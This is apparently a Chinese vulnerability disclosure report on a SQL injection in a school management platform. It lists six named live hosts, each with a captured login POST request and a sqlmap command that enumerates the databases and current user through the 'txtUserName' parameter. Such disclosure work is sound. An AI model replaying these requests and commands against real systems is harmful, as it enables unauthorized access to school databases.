### 简要描述: 某学校综合管理平台存在通用型SQL注入,涉及不少学校。 ### 详细说明: http://www.baidu.com/s?wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A56628124%2056626870 漏洞应用开发商:上海安脉计算机科技有限公司 1、http://ps.imau.edu.cn/anmai/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/25120420a56641d4f2ac7965a92f3ad489564d2e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25120420a56641d4f2ac7965a92f3ad489564d2e.png) b、将post请求保存2s.txt的文件。 POST /anmai/getsession.asp HTTP/1.1 Content-Length: 264 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=1rgrdf55yjvab055tdwcijft; ASPSESSIONIDACDCRQCD=MHOBLFNCCDJAKDACOOLMKBHF Host: ps.imau.edu.cn Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */*...
### 简要描述: 某学校综合管理平台存在通用型SQL注入,涉及不少学校。 ### 详细说明: http://www.baidu.com/s?wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A56628124%2056626870 漏洞应用开发商:上海安脉计算机科技有限公司 1、http://ps.imau.edu.cn/anmai/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/25120420a56641d4f2ac7965a92f3ad489564d2e.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25120420a56641d4f2ac7965a92f3ad489564d2e.png) b、将post请求保存2s.txt的文件。 POST /anmai/getsession.asp HTTP/1.1 Content-Length: 264 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=1rgrdf55yjvab055tdwcijft; ASPSESSIONIDACDCRQCD=MHOBLFNCCDJAKDACOOLMKBHF Host: ps.imau.edu.cn Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign%24signName=gveusgdw&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CuTl2BgGJo c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/2512072380ad499a1c64d5e19ce314139ad8c4fd.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512072380ad499a1c64d5e19ce314139ad8c4fd.png) [<img src="https://images.seebug.org/upload/201405/2512073643314918dc0a6a07d52b090a42f6a19f.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512073643314918dc0a6a07d52b090a42f6a19f.png) [<img src="https://images.seebug.org/upload/201405/2512075594820e26fad13039c90d6c5bb086587a.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512075594820e26fad13039c90d6c5bb086587a.png) 2、http://58.118.14.26/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/251208596210320b8126366df51f1b153a6c9b2d.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251208596210320b8126366df51f1b153a6c9b2d.png) b、将post请求保存2s.txt的文件。 POST /getsession.asp HTTP/1.1 Content-Length: 260 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=ggm1fu45mcjbu4jbjf1mhj55; ASPSESSIONIDAATQCTSD=PHFBHODDIJNFKGJHEFKGKIHG Host: 58.118.14.26 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign:signName=ltymqyff&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CubaaXVHPq c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/2512101043eba58fe241602d9c5a5d2c6b30060a.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512101043eba58fe241602d9c5a5d2c6b30060a.png) [<img src="https://images.seebug.org/upload/201405/251210262b906b49f0a620d7664cb3cc7b60086b.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251210262b906b49f0a620d7664cb3cc7b60086b.png) 3、http://www.wems.net:84/ a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/25121120f32a2fad94e039428b66f02f80aeb60c.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121120f32a2fad94e039428b66f02f80aeb60c.png) b、将post请求保存2s.txt的文件。 POST /getsession.asp HTTP/1.1 Content-Length: 264 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=x3ifu045a0hzti3k1deo1w45; ASPSESSIONIDQARDDDDQ=GEEFGBLDIGPBCCBANBFAJNGJ Host: www.wems.net:84 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign:signName=vflbcavb&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CutkFMIwfs c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/2512122290e0ff5a4dcda74697d0ee38b6b2c28d.png" alt="9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512122290e0ff5a4dcda74697d0ee38b6b2c28d.png) [<img src="https://images.seebug.org/upload/201405/2512124203e3d2189f128f0b4554ac64684bf6e9.png" alt="10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512124203e3d2189f128f0b4554ac64684bf6e9.png) [<img src="https://images.seebug.org/upload/201405/25121309604c9d5da5b0252fac560664f0edaae0.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121309604c9d5da5b0252fac560664f0edaae0.png) 4、http://www.syzxyz.com:8008/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/2512134905666746b3180da9a624aec72fc283ce.png" alt="12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512134905666746b3180da9a624aec72fc283ce.png) b、将post请求保存2s.txt的文件。 POST /getsession.asp HTTP/1.1 Content-Length: 264 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=ieh3jz55sqghif451v4pcvvn; ASPSESSIONIDSSRQAABR=GFMJIGIDKNAMDBOGONAKNHKI; %d5%d0%c9%fa%cd%b3%bc%c6=%d5%d0%c9%fa%cd%b3%bc%c6%7cRecruitstuManage%2frecruitstuStat%2fstudentState.aspx; %d1%a7%d0%a3%bc%f2%bd%e9=%d1%a7%d0%a3%bc%f2%bd%e9%7cRecruitstuManage%2fschoolinfo%2fschoolIntroduce.aspx Host: www.syzxyz.com:8008 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign%24signName=ylgpirky&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4Cu3JKPTkhu c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/251214579e23f4e728872419607af35d42b0b21a.png" alt="13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251214579e23f4e728872419607af35d42b0b21a.png) [<img src="https://images.seebug.org/upload/201405/25121509840d25296d2164414d4ed0b97747968b.png" alt="14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121509840d25296d2164414d4ed0b97747968b.png) 5、http://218.2.69.105:8090/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/2512155754a3694028124a1af4f0b3b10f1c1723.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512155754a3694028124a1af4f0b3b10f1c1723.png) b、将post请求保存2s.txt的文件。 POST /getsession.asp HTTP/1.1 Content-Length: 265 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=g0pfhk55ysesaz55qk1ohenu; ASPSESSIONIDSQDTSACR=NENLLMJDCDHLMCHNLIKMPKJH Host: 218.2.69.105:8090 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign%24signName=trkqqwxu&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CuGrMiSVsm c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/251216504ca8ca9efed84d911b6e951d45898610.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251216504ca8ca9efed84d911b6e951d45898610.png) [<img src="https://images.seebug.org/upload/201405/25121703e05f41efd8c7a9322279c3264195d79b.png" alt="17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121703e05f41efd8c7a9322279c3264195d79b.png) [<img src="https://images.seebug.org/upload/201405/2512172060000a39b50162764d0fffc2d92e7454.png" alt="18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/2512172060000a39b50162764d0fffc2d92e7454.png) 6、http://218.21.35.220/login.aspx a、用WVS扫描,发现参数"txtUserName"存在post型SQL注入。 [<img src="https://images.seebug.org/upload/201405/251218028aa1622fd23d46d0a21e7a151f6e5ada.png" alt="19.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/251218028aa1622fd23d46d0a21e7a151f6e5ada.png) b、将post请求保存2s.txt的文件。 POST /getsession.asp HTTP/1.1 Content-Length: 264 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=oad2w045cp2rtp550kmjeiah; ASPSESSIONIDQACDABTT=KGKDKDKDJCALIGLPLPOPOFLH Host: 218.21.35.220 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* GetMiddleSign%24signName=lbonxbch&hidaction=login&password=g00dPa%24%24w0rD&txtUserName=4CunP7dPebR c、用Sqlmap Sqlmap py -r 2s.txt -p "txtUserName" --dbs --current-user --current-db [<img src="https://images.seebug.org/upload/201405/25121844cef72eee1c5fc05b196d9d7d4d1b0fc5.png" alt="20.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/25121844cef72eee1c5fc05b196d9d7d4d1b0fc5.png) ### 漏洞证明: 已证明
